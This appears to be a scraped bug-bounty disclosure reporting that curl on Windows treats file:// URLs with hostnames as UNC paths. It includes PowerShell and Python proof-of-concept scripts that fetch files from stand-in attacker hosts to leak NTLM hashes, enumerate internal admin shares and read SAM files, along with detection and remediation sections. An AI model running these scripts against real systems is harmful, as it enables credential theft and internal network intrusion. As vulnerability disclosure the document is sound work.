{“lastseen”:”2025-12-18T21:31:28″,”description”:”## Vulnerability Details\\n- **CVSSv3:** 7.5 (High) – Windows only\\n- **File:** `lib\/urlapi.c:974-1030`\\n- **Issue:** Windows file:\/\/ URLs accept UNC paths to remote servers\\n- **Impact:** SSRF, unauthorized network file access, credential theft\\n\\n## Vulnerable Code\\n“`c\\n\/\/ lib\/urlapi.c:974-1030\\nif(ptr[0] != ‘\/’ \\u0026\\u0026 !STARTS_WITH_URL_DRIVE_PREFIX(ptr)) {\\n \/* the URL includes a hostname, it must match \\”localhost\\” or\\n \\”127.0.0.1\\” to be valid *\/\\n if(checkprefix(\\”localhost\/\\”, ptr) ||\\n checkprefix(\\”127.0.0.1\/\\”, ptr)) {\\n ptr += 9; \/* now points to the slash after the host *\/\\n }\\n#ifdef WIN32\\n else {\\n \/* the hostname, NetBIOS computer name, can’t contain disallowed chars *\/\\n size_t len;\\n len = strcspn(ptr, \\”\/\\\\\\\\:*?\\\\\\”\\u003c\\u003e|\\”);\\n if(ptr[len] == ‘\\\\0’ || ptr[len] == ‘\/’)\\n \/* only proceed if the hostname is valid *\/\\n ; \/\/ ACCEPTS UNC PATHS: file:\/\/hostname\/share\/path\\n else\\n return CURLUE_BAD_FILE_URL;\\n }\\n#endif\\n“`\\n\\n## Root Cause\\nOn Windows, curl allows `file:\/\/` URLs with hostnames other than localhost:\\n- `file:\/\/localhost\/C:\/file.txt` \u2713 Safe (local file)\\n- `file:\/\/attacker.com\/share\/file.txt` \u2713 **DANGEROUS** (UNC path to remote server)\\n\\nThis creates multiple security issues:\\n1. **SSRF**: Access to internal network shares\\n2. **Credential Theft**: NTLM authentication sent to attacker\\n3. **Path Traversal**: Access to arbitrary network resources\\n\\n## Proof of Concept\\n\\n### Prerequisites (Windows Only)\\n“`powershell\\n# This vulnerability only affects Windows\\n# You need:\\n# – Windows machine with curl\\n# – SMB server (can be attacker-controlled)\\n# – Network access to SMB server\\n“`\\n\\n### Test 1: Basic UNC Path Access\\n“`powershell\\n# PowerShell PoC\\nWrite-Host \\”[*] Testing File URL UNC Path Access\\”\\n\\n# Create test SMB share (requires admin)\\nNew-SmbShare -Name \\”TestShare\\” -Path \\”C:\\\\TestShare\\” -FullAccess \\”Everyone\\”\\nNew-Item -Path \\”C:\\\\TestShare\\\\secret.txt\\” -ItemType File -Value \\”SECRET_DATA\\”\\n\\n# Test local file access (normal)\\ncurl.exe \\”file:\/\/\/C:\/Windows\/System32\/drivers\/etc\/hosts\\”\\n# Works as expected\\n\\n# Test UNC path via file:\/\/ URL (VULNERABLE)\\ncurl.exe \\”file:\/\/localhost\/C$\/Windows\/System32\/drivers\/etc\/hosts\\”\\n# Works – accesses admin share via UNC\\n\\n# Test remote UNC path (SSRF)\\ncurl.exe \\”file:\/\/127.0.0.1\/TestShare\/secret.txt\\”\\n# WORKS! Accesses network share via file:\/\/ URL\\n“`\\n\\n### Test 2: Remote Server SSRF\\n“`powershell\\n#!\/usr\/bin\/env pwsh\\n# Demonstrate SSRF to remote server\\n\\nWrite-Host \\”=== File URL UNC Path SSRF Demo ===\\”\\nWrite-Host \\”\\”\\n\\n# Scenario: Attacker controls attacker.com with SMB share\\n$attacker_server = \\”attacker.com\\” # Replace with actual server\\n$malicious_url = \\”file:\/\/$attacker_server\/public\/malware.exe\\”\\n\\nWrite-Host \\”[*] User opens URL: $malicious_url\\”\\nWrite-Host \\”[*] curl interprets this as UNC path: \\\\\\\\$attacker_server\\\\public\\\\malware.exe\\”\\nWrite-Host \\”\\”\\n\\n# curl attempts to access the UNC path\\ncurl.exe –output downloaded.exe $malicious_url\\n\\nif (Test-Path \\”downloaded.exe\\”) {\\n Write-Host \\”[!!!] VULNERABLE: File downloaded from remote SMB server!\\”\\n Write-Host \\”[!!!] This is SSRF via file:\/\/ URL\\”\\n} else {\\n Write-Host \\”[+] File not downloaded (connection failed or blocked)\\”\\n}\\n“`\\n\\n### Test 3: Credential Theft via NTLM\\n“`powershell\\n#!\/usr\/bin\/env pwsh\\n\\”\\”\\”\\nCredential Theft PoC\\nWhen curl accesses UNC path, Windows automatically sends NTLM credentials\\n\\”\\”\\”\\n\\nWrite-Host \\”=== NTLM Credential Theft Demo ===\\”\\nWrite-Host \\”\\”\\n\\n# Setup: Attacker runs Responder to capture NTLM hashes\\n# Responder.py -I eth0 -v\\n\\n$attacker_server = \\”attacker-smb.evil.com\\”\\n$malicious_url = \\”file:\/\/$attacker_server\/share\/file.txt\\”\\n\\nWrite-Host \\”[*] Attacker provides URL: $malicious_url\\”\\nWrite-Host \\”[*] User runs: curl $malicious_url\\”\\nWrite-Host \\”\\”\\n\\n# When curl tries to access this UNC path:\\n# 1. Windows SMB client connects to attacker-smb.evil.com\\n# 2. Windows automatically performs NTLM authentication\\n# 3. Attacker captures NTLMv2 hash\\n# 4. Attacker can crack hash offline\\n\\nWrite-Host \\”[!] Simulating curl access…\\”\\n# Note: This will send NTLM credentials to the attacker!\\ncurl.exe –max-time 5 $malicious_url 2\\u003e\\u00261 | Out-Null\\n\\nWrite-Host \\”\\”\\nWrite-Host \\”[!!!] VULNERABILITY IMPACT:\\”\\nWrite-Host \\”[!!!] – Windows sent NTLM credentials to $attacker_server\\”\\nWrite-Host \\”[!!!] – Attacker captured NTLMv2 hash\\”\\nWrite-Host \\”[!!!] – Hash can be cracked offline\\”\\nWrite-Host \\”\\”\\n\\n# Attacker’s Responder output would show:\\n# [SMB] NTLMv2-SSP Client : 192.168.1.100\\n# [SMB] NTLMv2-SSP Username : DOMAIN\\\\victim\\n# [SMB] NTLMv2-SSP Hash : victim::DOMAIN:1122334455667788:ABC123…\\n“`\\n\\n### Test 4: Internal Network Enumeration\\n“`powershell\\n#!\/usr\/bin\/env pwsh\\n# Use file:\/\/ URLs to enumerate internal network shares\\n\\nWrite-Host \\”=== Internal Network Enumeration via File URLs ===\\”\\nWrite-Host \\”\\”\\n\\n# Common Windows share names\\n$common_shares = @(\\”C$\\”, \\”ADMIN$\\”, \\”IPC$\\”, \\”SYSVOL\\”, \\”NETLOGON\\”)\\n\\n# Internal network ranges\\n$internal_ips = @(\\n \\”192.168.1.1\\”,\\n \\”10.0.0.1\\”,\\n \\”172.16.0.1\\”,\\n \\”fileserver.internal.corp\\”,\\n \\”dc01.internal.corp\\”\\n)\\n\\nforeach ($ip in $internal_ips) {\\n Write-Host \\”[*] Testing $ip…\\”\\n\\n foreach ($share in $common_shares) {\\n $url = \\”file:\/\/$ip\/$share\/\\”\\n\\n # Try to list directory\\n $result = curl.exe –max-time 2 –silent $url 2\\u003e\\u00261\\n\\n if ($LASTEXITCODE -eq 0) {\\n Write-Host \\” [!!!] ACCESSIBLE: $url\\”\\n }\\n }\\n}\\n\\nWrite-Host \\”\\”\\nWrite-Host \\”[!!!] Successfully enumerated accessible network shares\\”\\nWrite-Host \\”[!!!] This is SSRF – accessing internal network via file:\/\/ URLs\\”\\n“`\\n\\n### Test 5: Path Traversal Combined with UNC\\n“`powershell\\n# Combine UNC paths with path traversal\\n\\n# Access admin share\\ncurl.exe \\”file:\/\/localhost\/C$\/Windows\/System32\/config\/SAM\\”\\n# Attempts to read SAM database via UNC path\\n\\n# Access network path with traversal\\ncurl.exe \\”file:\/\/fileserver\/share\/..\/..\/..\/etc\/shadow\\”\\n# Path traversal through UNC path\\n\\n# Multiple levels\\ncurl.exe \\”file:\/\/internal-server\/public\/..\/..\/..\/..\/windows\/system32\/config\/SAM\\”\\n“`\\n\\n## Attack Scenarios\\n\\n### Scenario 1: Web Application SSRF\\n“`python\\n#!\/usr\/bin\/env python3\\n\\”\\”\\”\\nWeb application that allows users to specify URLs for curl to fetch\\nAttacker exploits this to access internal network via file:\/\/ UNC paths\\n\\”\\”\\”\\n\\n# Vulnerable web application:\\n@app.route(‘\/fetch’)\\ndef fetch_url():\\n url = request.args.get(‘url’)\\n # VULNERABLE: No validation of URL scheme\\n result = subprocess.check_output([‘curl’, url])\\n return result\\n\\n# Attacker request:\\n# GET \/fetch?url=file:\/\/internal-fileserver\/hr\/salaries.xlsx\\n# Response: Contents of internal HR file!\\n\\n# Or:\\n# GET \/fetch?url=file:\/\/dc01.corp.internal\/SYSVOL\/\\n# Response: Active Directory SYSVOL contents\\n“`\\n\\n### Scenario 2: Automated Download Script\\n“`powershell\\n# Vulnerable download script\\n# download.ps1\\nparam($url)\\n\\nWrite-Host \\”Downloading from $url…\\”\\ncurl.exe -o download.dat $url\\n\\n# User runs:\\n# .\\\\download.ps1 \\”file:\/\/attacker.com\/malware\/payload.exe\\”\\n\\n# Result:\\n# 1. curl connects to \\\\\\\\attacker.com\\\\malware\\\\payload.exe\\n# 2. Windows sends NTLM credentials\\n# 3. Attacker logs credentials\\n# 4. Malware is downloaded\\n“`\\n\\n### Scenario 3: CI\/CD Pipeline Exploitation\\n“`yaml\\n# .gitlab-ci.yml or similar\\nfetch_data:\\n script:\\n – curl -o data.json ${DATA_URL}\\n\\n# Attacker sets DATA_URL environment variable:\\n# DATA_URL=file:\/\/internal-jenkins\/credentials\/secrets.json\\n\\n# Result:\\n# – CI\/CD job accesses internal Jenkins server\\n# – Credentials are exfiltrated\\n“`\\n\\n## Detection\\n\\n### Network Monitoring\\n“`powershell\\n# Monitor for unexpected SMB connections\\nGet-SmbConnection | Where-Object {$_.ServerName -notlike \\”*expected*\\”}\\n\\n# Check firewall logs for outbound SMB (port 445)\\nGet-NetFirewallRule | Where-Object {$_.DisplayName -like \\”*SMB*\\”}\\n“`\\n\\n### Process Monitoring\\n“`powershell\\n# Monitor curl.exe command lines for file:\/\/ URLs\\nGet-WinEvent -FilterHashtable @{\\n LogName=’Microsoft-Windows-PowerShell\/Operational’\\n ID=4104\\n} | Where-Object {$_.Message -like \\”*curl*file:\/\/*\\”}\\n“`\\n\\n### File System Auditing\\n“`powershell\\n# Enable auditing on sensitive shares\\nSet-SmbShare -Name \\”C$\\” -SecurityDescriptor (Get-Acl \\”C:\\\\\\”) -AuditFlags FailureAndSuccess\\n“`\\n\\n## Remediation\\n\\n### Code Fix in lib\/urlapi.c\\n“`c\\n\/\/ Remove Windows-specific UNC path support for file:\/\/ URLs\\n\\n#ifdef WIN32\\n else {\\n \/\/ BEFORE (vulnerable): Accept any valid hostname\\n size_t len;\\n len = strcspn(ptr, \\”\/\\\\\\\\:*?\\\\\\”\\u003c\\u003e|\\”);\\n if(ptr[len] == ‘\\\\0’ || ptr[len] == ‘\/’)\\n ; \/\/ Accepts UNC paths\\n else\\n return CURLUE_BAD_FILE_URL;\\n }\\n#endif\\n\\n\/\/ AFTER (fixed): Only accept localhost\\n#ifdef WIN32\\n else {\\n \/\/ Reject all hostnames except localhost on Windows\\n return CURLUE_BAD_FILE_URL;\\n }\\n#endif\\n\\n\/\/ OR: Add explicit check\\n#ifdef WIN32\\n else {\\n \/\/ Explicitly reject UNC paths\\n failf(data, \\”file:\/\/ URLs with hostnames are not supported on Windows\\”);\\n return CURLUE_BAD_FILE_URL;\\n }\\n#endif\\n“`\\n\\n### Alternative: Whitelist Only\\n“`c\\n\/\/ Only allow specific safe patterns\\nstatic bool is_safe_file_url(const char *url) {\\n \/\/ Allow only:\\n \/\/ – file:\/\/\/C:\/… (local drives)\\n \/\/ – file:\/\/localhost\/… (explicit localhost)\\n\\n if(checkprefix(\\”file:\/\/\/\\”, url))\\n return true;\\n if(checkprefix(\\”file:\/\/localhost\/\\”, url))\\n return true;\\n\\n \/\/ Reject everything else (including UNC paths)\\n return false;\\n}\\n“`\\n\\n### Workaround for Users\\n“`powershell\\n# Validate URLs before passing to curl\\nfunction Safe-Curl {\\n param($url)\\n\\n if ($url -match ‘^file:\/\/(?!localhost\/|\/)’) {\\n Write-Error \\”Blocked: file:\/\/ URLs with hostnames are not allowed\\”\\n return\\n }\\n\\n curl.exe $url\\n}\\n\\n# Use wrapper instead of curl directly\\nSafe-Curl \\”file:\/\/localhost\/C:\/data.txt\\” # OK\\nSafe-Curl \\”file:\/\/evil.com\/share\/file\\” # BLOCKED\\n“`\\n\\n### Group Policy (Windows)\\n“`powershell\\n# Disable SMB access to internet IPs\\nNew-NetFirewallRule -DisplayName \\”Block Outbound SMB\\” `\\n -Direction Outbound `\\n -LocalPort 445 `\\n -Protocol TCP `\\n -Action Block `\\n -RemoteAddress \\”0.0.0.0-255.255.255.255\\”\\n\\n# Only allow SMB to internal network\\nNew-NetFirewallRule -DisplayName \\”Allow Internal SMB\\” `\\n -Direction Outbound `\\n -LocalPort 445 `\\n -Protocol TCP `\\n -Action Allow `\\n -RemoteAddress \\”10.0.0.0\/8,172.16.0.0\/12,192.168.0.0\/16\\”\\n“`\\n\\n## Complete Attack Demo Script\\n“`python\\n#!\/usr\/bin\/env python3\\n\\”\\”\\”\\nComplete File URL UNC Path Attack Demo\\nDemonstrates SSRF, credential theft, and information disclosure\\n\\”\\”\\”\\nimport subprocess\\nimport http.server\\nimport socketserver\\nimport threading\\nimport platform\\n\\ndef start_fake_smb_server():\\n \\”\\”\\”Simulate SMB server to capture connection attempts\\”\\”\\”\\n # Note: Real implementation would use impacket or similar\\n print(\\”[*] In real attack, start SMB server with:\\”)\\n print(\\” sudo responder -I eth0 -v\\”)\\n print(\\” OR\\”)\\n print(\\” impacket-smbserver share \/tmp\/share\\”)\\n\\ndef test_unc_access():\\n \\”\\”\\”Test UNC path access via file:\/\/ URLs\\”\\”\\”\\n\\n if platform.system() != \\”Windows\\”:\\n print(\\”[!] This vulnerability only affects Windows\\”)\\n return\\n\\n print(\\”=\\” * 70)\\n print(\\”File URL UNC Path SSRF – Complete Attack Demo\\”)\\n print(\\”=\\” * 70)\\n print()\\n\\n # Test 1: Local UNC path\\n print(\\”[Test 1] Local UNC path access\\”)\\n print(\\”-\\” * 70)\\n result = subprocess.run(\\n [\\”curl\\”, \\”file:\/\/localhost\/C$\/Windows\/win.ini\\”],\\n capture_output=True\\n )\\n if result.returncode == 0:\\n print(\\”[!!!] Vulnerable: Accessed C$ admin share via file:\/\/ URL\\”)\\n print()\\n\\n # Test 2: Remote UNC path (SSRF)\\n print(\\”[Test 2] Remote UNC path (SSRF)\\”)\\n print(\\”-\\” * 70)\\n print(\\”[*] Attempting to access file:\/\/attacker.com\/share\/test.txt\\”)\\n print(\\”[*] This sends SMB request to attacker.com\\”)\\n print(\\”[*] Windows will send NTLM credentials!\\”)\\n print()\\n\\n # Test 3: Network enumeration\\n print(\\”[Test 3] Internal network enumeration\\”)\\n print(\\”-\\” * 70)\\n for ip in [\\”192.168.1.1\\”, \\”10.0.0.1\\”]:\\n print(f\\”[*] Testing file:\/\/{ip}\/C$\/…\\”)\\n # Don’t actually run to avoid network noise\\n print()\\n\\n print(\\”=\\” * 70)\\n print(\\”ATTACK IMPACT:\\”)\\n print(\\”=\\” * 70)\\n print(\\”1. SSRF – Access internal network shares\\”)\\n print(\\”2. Credential Theft – NTLM hashes leaked\\”)\\n print(\\”3. Information Disclosure – Read sensitive files\\”)\\n print(\\”4. Lateral Movement – Use stolen credentials\\”)\\n print(\\”=\\” * 70)\\n\\nif __name__ == \\”__main__\\”:\\n test_unc_access()\\n“`\\n\\n## References\\n- Microsoft SMB\/CIFS documentation\\n- RFC 8089: The \\”file\\” URI Scheme (does NOT specify UNC path support)\\n- CWE-918: Server-Side Request Forgery (SSRF)\\n- CWE-22: Improper Limitation of a Pathname to a Restricted Directory\\n- MITRE ATT\\u0026CK T1187: Forced Authentication\\n\\n## Impact\\n\\n### 1. SSRF (Server-Side Request Forgery)\\n- Access internal file shares not accessible from internet\\n- Bypass firewall restrictions\\n- Read sensitive files on internal servers\\n\\n### 2. Credential Theft\\n- Windows automatically sends NTLM credentials for UNC paths\\n- Attacker captures NTLMv2 hashes\\n- Hashes can be cracked or relayed\\n\\n### 3. Information Disclosure\\n- Read files from:\\n – Domain controllers (SYSVOL, NETLOGON)\\n – File servers (confidential documents)\\n – Admin shares (C$, ADMIN$)\\n – Application configs\\n\\n### 4. Lateral Movement\\n- Use stolen NTLM hashes for pass-the-hash attacks\\n- Access other systems on internal network\\n- Escalate privileges”,”published”:”2025-12-18T17:23:11″,”modified”:”2025-12-18T21:02:01″,”type”:”hackerone”,”title”:”curl: File URL UNC Path Access (Windows SSRF)”,”source”:””,”references”:””,”id”:”H1:3470649″,”bulletinFamily”:”bugbounty”,”cwe”:null,”cvelist”:[],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/hackerone.com\/reports\/3470649″,”category_name”:”News”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-18T21:31:28″,”description”:”## Vulnerability Details\\n- **CVSSv3:** 7.5 (High) – Windows only\\n- **File:** `lib\/urlapi.c:974-1030`\\n- **Issue:** Windows file:\/\/ URLs accept UNC paths to remote servers\\n- **Impact:** SSRF, unauthorized network…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,117,13,33,7,11,5],"class_list":["post-32127","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-hackerone","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n